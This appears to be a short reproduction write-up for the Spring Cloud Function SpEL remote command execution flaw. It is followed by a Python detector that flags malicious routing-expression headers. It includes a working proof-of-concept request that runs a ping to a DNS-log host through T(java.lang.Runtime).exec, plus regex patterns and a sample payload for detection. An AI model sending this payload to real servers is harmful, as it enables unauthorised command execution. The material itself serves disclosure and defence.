Spring Cloud Function SpEL Remote Command Execution Vulnerability
Vulnerability Description
Spring Cloud Function is a Spring Boot-based functional computing framework that abstracts all transport details and infrastructure, allowing developers to retain all familiar tools and processes, and focus on business logic.
Vulnerability Impact
Spring Cloud Function
Environment setup
https://github.com/spring-cloud/spring-cloud-function/tree/main/spring-cloud-function-samples/function-sample-pojo
Vulnerability reproduction
After building, visit
Send the PoC request:
POST /functionRouter HTTP/1.1
Host: 192.168.1.27:9000
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("ping -c 1 dxytoy.dnslog.cn")
Content-Length: 1
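The spring.cloud.function.routing-expression header in the request above is what the vulnerable router hands to the SpEL evaluator. As an added defensive example (not code from the original post or from the Spring Cloud Function project), the Python below parses raw HTTP requests and flags a routing-expression header whose value contains constructs a legitimate routing expression never needs, such as a SpEL type reference T(...) or a call to getRuntime/exec. The sample requests and hostnames are constructed placeholders.

```python
import re

# Header that the vulnerable routing function passes straight to the SpEL
# evaluator (header name taken from the request on the page).
ROUTING_HEADER = "spring.cloud.function.routing-expression"

# Constructs a legitimate routing expression (a function name, or a lookup
# such as headers['function']) has no reason to contain.
SUSPICIOUS = [
    ("type-reference", re.compile(r"\bT\s*\(")),          # T(java.lang.Runtime)
    ("runtime", re.compile(r"\bgetRuntime\s*\(")),
    ("exec", re.compile(r"\bexec\s*\(")),
    ("process-builder", re.compile(r"\bProcessBuilder\b")),
    ("classloader", re.compile(r"\bClassLoader\b")),
]


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (request line, {lower-cased header: value})."""
    head = re.split(r"\r?\n\r?\n", raw, maxsplit=1)[0]
    lines = [line for line in head.splitlines() if line.strip()]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def assess(raw):
    """Verdict for one request: is the routing header present, and which
    suspicious constructs does its value match?"""
    request_line, headers = parse_request(raw)
    value = headers.get(ROUTING_HEADER)
    hits = [] if value is None else [name for name, rx in SUSPICIOUS if rx.search(value)]
    return {"request_line": request_line, "routing_expression": value,
            "suspicious": bool(hits), "hits": hits}


def flag_requests(raw_requests):
    """Run assess() over captured requests and return only the suspicious ones."""
    return [v for v in map(assess, raw_requests) if v["suspicious"]]


# Constructed samples: the page's request shape with placeholder hosts, and a benign one.
MALICIOUS = ("POST /functionRouter HTTP/1.1\r\nHost: app.example.invalid:9000\r\n"
             "spring.cloud.function.routing-expression: "
             'T(java.lang.Runtime).getRuntime().exec("ping -c 1 attacker.example.invalid")\r\n'
             "Content-Length: 1\r\n\r\nx")
BENIGN = ("POST /functionRouter HTTP/1.1\r\nHost: app.example.invalid:9000\r\n"
          "spring.cloud.function.routing-expression: 'uppercase'\r\n"
          "Content-Length: 5\r\n\r\nhello")

if __name__ == "__main__":
    for verdict in flag_requests([MALICIOUS, BENIGN]):
        print(verdict["request_line"], verdict["hits"])
```

The same patterns can be applied at a reverse proxy or WAF; a stricter mitigation is to reject the header entirely unless the application actually relies on expression-based routing.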